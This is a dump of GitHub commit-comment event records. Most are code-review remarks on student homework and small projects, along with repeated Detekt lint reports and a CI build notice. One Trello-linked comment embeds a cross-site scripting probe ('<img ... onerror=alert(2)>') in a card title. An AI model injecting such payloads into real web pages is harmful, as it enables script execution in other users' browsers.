{"id":"8000413965","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793018,"position":null,"line":null,"path":null,"commit_id":"9d45e83c1ae99a4583e972bf007ac67bcb3c6a97","created_at":"2018-07-22T15:39:33Z","updated_at":"2018-07-22T15:39:33Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L17)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L19)\n- [EmptyElseBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L13)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L15)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L7)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/buildSrc/src/main/kotlin/com/example/gradle/GithubCommitCommenter.kt#L16)\n"}},"created_at":"2018-07-22T15:39:33Z"}
{"id":"8000414451","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29793019,"position":null,"line":null,"path":null,"commit_id":"e0c95c0f583857f080da788bd7019a23704b1a3b","created_at":"2018-07-22T15:39:52Z","updated_at":"2018-07-22T15:39:52Z","author_association":"OWNER","body":"commit index"}},"created_at":"2018-07-22T15:39:52Z"}
{"id":"8000414878","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793020,"position":26,"line":26,"path":"Lesson4HW/Task2.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:40:09Z","updated_at":"2018-07-22T15:40:09Z","author_association":"NONE","body":" int b = 0;\r\n+        a[b] = a[0];\r\nПохоже на какую-то чертовщину, зачем саму себя присваивать таким образом?"}},"created_at":"2018-07-22T15:40:09Z"}
{"id":"8000415176","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793021,"position":209,"line":71,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:40:18Z","updated_at":"2018-07-22T15:40:18Z","author_association":"NONE","body":"Move this comment inside the true portion of the if statement.  Talk about what the condition means.\r\n\r\nIE:\r\n```js\r\n  handleNumber = (number) => {\r\n    if (this.flagNewNumber) {\r\n      // if number is new, stores in ACC\r\n      this.acc = this.currentNumber\r\n      this.currentNumber = '' + number;\r\n      this.flagNewNumber = false;\r\n    } else {\r\n      // if number is not new, store in Current Number\r\n```"}},"created_at":"2018-07-22T15:40:18Z"}
{"id":"8000415198","type":"CommitCommentEvent","actor":{"login":"jakobdoerr"},"repo":{"name":"smichel/LEX_2018_grenzschicht"},"payload":{"comment":{"id":29793022,"position":null,"line":null,"path":null,"commit_id":"f68f66d9b37cb5e580fa0b45835ecb716c5d57fe","created_at":"2018-07-22T15:40:20Z","updated_at":"2018-07-22T15:40:20Z","author_association":"COLLABORATOR","body":"Das neue Liveplotten ist schneller als das alte, ist aber immernoch zu langsam, um alles plotten zu können. Ich habe deshalb eingebaut, dass nicht alles geplottet wird, sondern nur die letzten x Sekunden (kann man einstellen). Vielleicht gibt es noch einen weg, dass nicht jedes mal neu geplottet wird. Mit set_data habe ich nur einen Weg gefunden, über blit, aber das hat auf meinem Mac nicht funktioniert und war mir dann zu kompliziert."}},"created_at":"2018-07-22T15:40:20Z"}
{"id":"8000415363","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793023,"position":8,"line":8,"path":"Lesson4HW/Task3.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:40:26Z","updated_at":"2018-07-22T15:40:26Z","author_association":"NONE","body":"где скобочки?"}},"created_at":"2018-07-22T15:40:26Z"}
{"id":"8000415841","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793024,"position":18,"line":18,"path":"Lesson4HW/Task3.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:40:45Z","updated_at":"2018-07-22T15:40:45Z","author_association":"NONE","body":"main должен быть в самом вверху"}},"created_at":"2018-07-22T15:40:45Z"}
{"id":"8000415920","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":29793025,"position":30,"line":177,"path":"AI/VCAI/ResourceManager.cpp","commit_id":"e79478466dd23a05b319abd3caaee3d4554d3be2","created_at":"2018-07-22T15:40:49Z","updated_at":"2018-07-22T15:40:49Z","author_association":"MEMBER","body":"Sorry. yes it`s part, but accept only iterators as input. "}},"created_at":"2018-07-22T15:40:49Z"}
{"id":"8000416065","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793026,"position":null,"line":null,"path":null,"commit_id":"9d45e83c1ae99a4583e972bf007ac67bcb3c6a97","created_at":"2018-07-22T15:40:55Z","updated_at":"2018-07-22T15:40:55Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L17)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L19)\n- [EmptyElseBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L13)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L15)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L7)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/buildSrc/src/main/kotlin/com/example/gradle/GithubCommitCommenter.kt#L16)\n"}},"created_at":"2018-07-22T15:40:55Z"}
{"id":"8000416326","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793027,"position":12,"line":12,"path":"cart.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:41:08Z","updated_at":"2018-07-22T15:41:08Z","author_association":"NONE","body":"в руби принято при написании хешей оставлять пробел после и перед фигурными скобками, вот так хорошо:\r\n```ruby\r\ngood_hash = { a: 1, b: 2 }\r\n```\r\nа вот так плохо:\r\n```ruby\r\nbad_hash = {a: 1, b: 2}\r\n```\r\n"}},"created_at":"2018-07-22T15:41:08Z"}
{"id":"8000416447","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793028,"position":14,"line":14,"path":"Lesson4HW/Task3.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:41:13Z","updated_at":"2018-07-22T15:41:13Z","author_association":"NONE","body":"задача было самому написать такой алгоритм, а не использовать готовые, иначе ничему не научитесь"}},"created_at":"2018-07-22T15:41:13Z"}
{"id":"8000416536","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793029,"position":178,"line":40,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:41:16Z","updated_at":"2018-07-22T15:41:16Z","author_association":"NONE","body":"Remove extraneous commentary \"all this does is\"."}},"created_at":"2018-07-22T15:41:16Z"}
{"id":"8000416777","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793030,"position":36,"line":36,"path":"Lesson4HW/Task3.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:41:27Z","updated_at":"2018-07-22T15:41:27Z","author_association":"NONE","body":"не за чем оставлять столько пустых строк после окончания класса"}},"created_at":"2018-07-22T15:41:27Z"}
{"id":"8000417881","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793031,"position":null,"line":null,"path":null,"commit_id":"9d45e83c1ae99a4583e972bf007ac67bcb3c6a97","created_at":"2018-07-22T15:42:13Z","updated_at":"2018-07-22T15:42:13Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L17)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L19)\n- [EmptyElseBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L13)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L15)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L7)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/buildSrc/src/main/kotlin/com/example/gradle/GithubCommitCommenter.kt#L16)\n"}},"created_at":"2018-07-22T15:42:13Z"}
{"id":"8000418181","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793032,"position":13,"line":13,"path":"Lesson4HW/Task4.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:42:27Z","updated_at":"2018-07-22T15:42:27Z","author_association":"NONE","body":"не верно рассчитан размер нового массива"}},"created_at":"2018-07-22T15:42:27Z"}
{"id":"8000418381","type":"CommitCommentEvent","actor":{"login":"S191617"},"repo":{"name":"MDCGP105-1718/portfolio-S191617"},"payload":{"comment":{"id":29793033,"position":null,"line":null,"path":null,"commit_id":"c5c4ac715e8520a99518f441b6efe6b5c3a7d0c8","created_at":"2018-07-22T15:42:35Z","updated_at":"2018-07-22T15:42:35Z","author_association":"COLLABORATOR","body":"please ignore "}},"created_at":"2018-07-22T15:42:35Z"}
{"id":"8000418779","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793035,"position":117,"line":26,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:42:52Z","updated_at":"2018-07-22T15:42:52Z","author_association":"NONE","body":"Comment could be rewritten as:\r\n\"Only call calculate when we have two valid operands\""}},"created_at":"2018-07-22T15:42:52Z"}
{"id":"8000419063","type":"CommitCommentEvent","actor":{"login":"S191617"},"repo":{"name":"MDCGP105-1718/portfolio-S191617"},"payload":{"comment":{"id":29793036,"position":null,"line":null,"path":null,"commit_id":"c5c4ac715e8520a99518f441b6efe6b5c3a7d0c8","created_at":"2018-07-22T15:43:03Z","updated_at":"2018-07-22T15:43:03Z","author_association":"COLLABORATOR","body":"please ignore"}},"created_at":"2018-07-22T15:43:03Z"}
{"id":"8000419284","type":"CommitCommentEvent","actor":{"login":"S191617"},"repo":{"name":"MDCGP105-1718/portfolio-S191617"},"payload":{"comment":{"id":29793037,"position":null,"line":null,"path":null,"commit_id":"f9447671ed0933a4bc9ae2a97590567849658e79","created_at":"2018-07-22T15:43:14Z","updated_at":"2018-07-22T15:43:14Z","author_association":"COLLABORATOR","body":"please ignore"}},"created_at":"2018-07-22T15:43:14Z"}
{"id":"8000419344","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793038,"position":18,"line":18,"path":"Lesson4HW/Task4.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:43:16Z","updated_at":"2018-07-22T15:43:16Z","author_association":"NONE","body":"ну и естественно алгоритм тоже получился не верный"}},"created_at":"2018-07-22T15:43:16Z"}
{"id":"8000419533","type":"CommitCommentEvent","actor":{"login":"S191617"},"repo":{"name":"MDCGP105-1718/portfolio-S191617"},"payload":{"comment":{"id":29793039,"position":null,"line":null,"path":null,"commit_id":"fdb10c3dc059081a1093151e7d32672ecef6f735","created_at":"2018-07-22T15:43:24Z","updated_at":"2018-07-22T15:43:24Z","author_association":"COLLABORATOR","body":"please ignore"}},"created_at":"2018-07-22T15:43:24Z"}
{"id":"8000419856","type":"CommitCommentEvent","actor":{"login":"S191617"},"repo":{"name":"MDCGP105-1718/portfolio-S191617"},"payload":{"comment":{"id":29793040,"position":null,"line":null,"path":null,"commit_id":"9c586923da59b22f26cb83ab64cba7a53dfc9bb8","created_at":"2018-07-22T15:43:37Z","updated_at":"2018-07-22T15:43:37Z","author_association":"COLLABORATOR","body":"please ignore\r\n"}},"created_at":"2018-07-22T15:43:37Z"}
{"id":"8000420165","type":"CommitCommentEvent","actor":{"login":"ZackLaskar"},"repo":{"name":"ZackLaskar/Python"},"payload":{"comment":{"id":29793041,"position":3,"line":3,"path":"envProps2DictFrUCD.py","commit_id":"360e9668b985c355e948b03429d4b85a66c57f3b","created_at":"2018-07-22T15:43:51Z","updated_at":"2018-07-22T15:43:51Z","author_association":"OWNER","body":"Please remove the whitespaces."}},"created_at":"2018-07-22T15:43:51Z"}
{"id":"8000420210","type":"CommitCommentEvent","actor":{"login":"S191617"},"repo":{"name":"MDCGP105-1718/portfolio-S191617"},"payload":{"comment":{"id":29793042,"position":null,"line":null,"path":null,"commit_id":"8c7c5b1448512d64d7680617575505239c02ef48","created_at":"2018-07-22T15:43:52Z","updated_at":"2018-07-22T15:43:52Z","author_association":"COLLABORATOR","body":"please ignore "}},"created_at":"2018-07-22T15:43:52Z"}
{"id":"8000420316","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793043,"position":13,"line":13,"path":"Lesson5HW/Task1.java","commit_id":"0554089d25384dc99ca8aa8582ca6e12b982735c","created_at":"2018-07-22T15:43:57Z","updated_at":"2018-07-22T15:43:57Z","author_association":"NONE","body":"скобочки совсем не хочешь расставлять"}},"created_at":"2018-07-22T15:43:57Z"}
{"id":"8000420675","type":"CommitCommentEvent","actor":{"login":"Dharani-abss"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29793044,"position":null,"line":null,"path":null,"commit_id":"717d1b404f5894b791bd8323e1f4c459cec37fed","created_at":"2018-07-22T15:44:09Z","updated_at":"2018-07-22T15:44:09Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GH - first shot2<img src=d onerror=alert(2);>](https://trello.com/c/vo0dQCjY/2-gh-first-shot)"}},"created_at":"2018-07-22T15:44:09Z"}
{"id":"8000421273","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793046,"position":45,"line":45,"path":"Lesson5HW/Task2.java","commit_id":"0554089d25384dc99ca8aa8582ca6e12b982735c","created_at":"2018-07-22T15:44:33Z","updated_at":"2018-07-22T15:44:33Z","author_association":"NONE","body":"скобочек вообще нигде нет, ужас. Да и switch тут смотрелся бы гораздо лучше"}},"created_at":"2018-07-22T15:44:33Z"}
{"id":"8000421373","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":29793047,"position":30,"line":177,"path":"AI/VCAI/ResourceManager.cpp","commit_id":"e79478466dd23a05b319abd3caaee3d4554d3be2","created_at":"2018-07-22T15:44:38Z","updated_at":"2018-07-22T15:44:38Z","author_association":"MEMBER","body":"BTW. we use std::find_if in vstd::contains_if"}},"created_at":"2018-07-22T15:44:38Z"}
{"id":"8000421660","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793048,"position":14,"line":14,"path":"cart.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:44:50Z","updated_at":"2018-07-22T15:44:50Z","author_association":"NONE","body":"лучше `hash` заменить на что-то более осмысленное, хотя конечно здесь речь идет о наборе данных, который хранится в хеше, этого отрицать нельзя  )))\r\nвозможно `data` или `info`, или еще что-то в подобном роде"}},"created_at":"2018-07-22T15:44:50Z"}
{"id":"8000421666","type":"CommitCommentEvent","actor":{"login":"Arkelis"},"repo":{"name":"origenial/origenial.fr"},"payload":{"comment":{"id":29793049,"position":null,"line":null,"path":null,"commit_id":"6c6dceb0f5a93855b551250b070c4d59b6a8ef15","created_at":"2018-07-22T15:44:51Z","updated_at":"2018-07-22T15:44:51Z","author_association":"CONTRIBUTOR","body":"Tu te chauffes :stuck_out_tongue: "}},"created_at":"2018-07-22T15:44:51Z"}
{"id":"8000421747","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793050,"position":8,"line":8,"path":"Lesson5HW/Task2.java","commit_id":"0554089d25384dc99ca8aa8582ca6e12b982735c","created_at":"2018-07-22T15:44:54Z","updated_at":"2018-07-22T15:44:54Z","author_association":"NONE","body":"почему с большой буквы?"}},"created_at":"2018-07-22T15:44:54Z"}
{"id":"8000422279","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793052,"position":11,"line":11,"path":"Lesson5HW/Task2.java","commit_id":"0554089d25384dc99ca8aa8582ca6e12b982735c","created_at":"2018-07-22T15:45:13Z","updated_at":"2018-07-22T15:45:13Z","author_association":"NONE","body":"не надо делать отступ в первой строчке метода"}},"created_at":"2018-07-22T15:45:13Z"}
{"id":"8000423270","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793056,"position":23,"line":23,"path":"Lesson5HW/Task2.java","commit_id":"0554089d25384dc99ca8aa8582ca6e12b982735c","created_at":"2018-07-22T15:45:53Z","updated_at":"2018-07-22T15:45:53Z","author_association":"NONE","body":"что за ; в конце else?"}},"created_at":"2018-07-22T15:45:53Z"}
{"id":"8000423530","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/lesson2"},"payload":{"comment":{"id":29793057,"position":12,"line":12,"path":"cart.rb","commit_id":"dfba9242b818f3e14678e2fe669327af8771e984","created_at":"2018-07-22T15:46:03Z","updated_at":"2018-07-22T15:46:03Z","author_association":"NONE","body":"нужно добавить пробел перед знаком \"равно\""}},"created_at":"2018-07-22T15:46:03Z"}
{"id":"8000423681","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793058,"position":24,"line":24,"path":"Lesson5HW/Task2.java","commit_id":"0554089d25384dc99ca8aa8582ca6e12b982735c","created_at":"2018-07-22T15:46:08Z","updated_at":"2018-07-22T15:46:08Z","author_association":"NONE","body":"задача решена не верно, только одну букву проверяешь"}},"created_at":"2018-07-22T15:46:08Z"}
{"id":"8000425402","type":"CommitCommentEvent","actor":{"login":"jdegoes"},"repo":{"name":"sideeffffect/scalaz-zio"},"payload":{"comment":{"id":29793066,"position":14,"line":826,"path":"core/shared/src/main/scala/scalaz/zio/IO.scala","commit_id":"7ca95d7905fb612c9f0e923bec9537ec82f6b839","created_at":"2018-07-22T15:47:17Z","updated_at":"2018-07-22T15:47:17Z","author_association":"NONE","body":"You should use `IO.sync` for effects, not `IO.point`."}},"created_at":"2018-07-22T15:47:17Z"}
{"id":"8000425458","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29793067,"position":15,"line":15,"path":"src/lesson4/Task1.java","commit_id":"1c37b5a07a9c529d2aca4a88a0ee46ffa461df8c","created_at":"2018-07-22T15:47:19Z","updated_at":"2018-07-22T15:47:19Z","author_association":"NONE","body":"не надо этих странных строчек кода и магических чисел"}},"created_at":"2018-07-22T15:47:19Z"}
{"id":"8000425768","type":"CommitCommentEvent","actor":{"login":"jdegoes"},"repo":{"name":"sideeffffect/scalaz-zio"},"payload":{"comment":{"id":29793068,"position":42,"line":888,"path":"core/shared/src/main/scala/scalaz/zio/IO.scala","commit_id":"7ca95d7905fb612c9f0e923bec9537ec82f6b839","created_at":"2018-07-22T15:47:33Z","updated_at":"2018-07-22T15:47:33Z","author_association":"NONE","body":"Ditto here."}},"created_at":"2018-07-22T15:47:33Z"}
{"id":"8000426352","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29793070,"position":null,"line":null,"path":null,"commit_id":"e2d2505943ff98ffb8a9363793d736cb920f2b7a","created_at":"2018-07-22T15:47:59Z","updated_at":"2018-07-22T15:47:59Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2987 of 2987 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-22T15:47:59Z"}
{"id":"8000426522","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"MiCode/Xiaomi_Kernel_OpenSource"},"payload":{"comment":{"id":29793071,"position":null,"line":null,"path":null,"commit_id":"77a8d5a440cb27ed2fdf3767aadf8d259701094f","created_at":"2018-07-22T15:48:07Z","updated_at":"2018-07-22T15:48:07Z","author_association":"NONE","body":"Will there be oreo?"}},"created_at":"2018-07-22T15:48:07Z"}
{"id":"8000426538","type":"CommitCommentEvent","actor":{"login":"ZackLaskar"},"repo":{"name":"ZackLaskar/Python"},"payload":{"comment":{"id":29793072,"position":12,"line":12,"path":"envProps2DictFrUCD.py","commit_id":"360e9668b985c355e948b03429d4b85a66c57f3b","created_at":"2018-07-22T15:48:07Z","updated_at":"2018-07-22T15:48:07Z","author_association":"OWNER","body":"Please remove the whitespaces."}},"created_at":"2018-07-22T15:48:07Z"}
{"id":"8000427062","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793075,"position":null,"line":null,"path":null,"commit_id":"9d45e83c1ae99a4583e972bf007ac67bcb3c6a97","created_at":"2018-07-22T15:48:25Z","updated_at":"2018-07-22T15:48:25Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L17)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L19)\n- [EmptyElseBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L13)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - 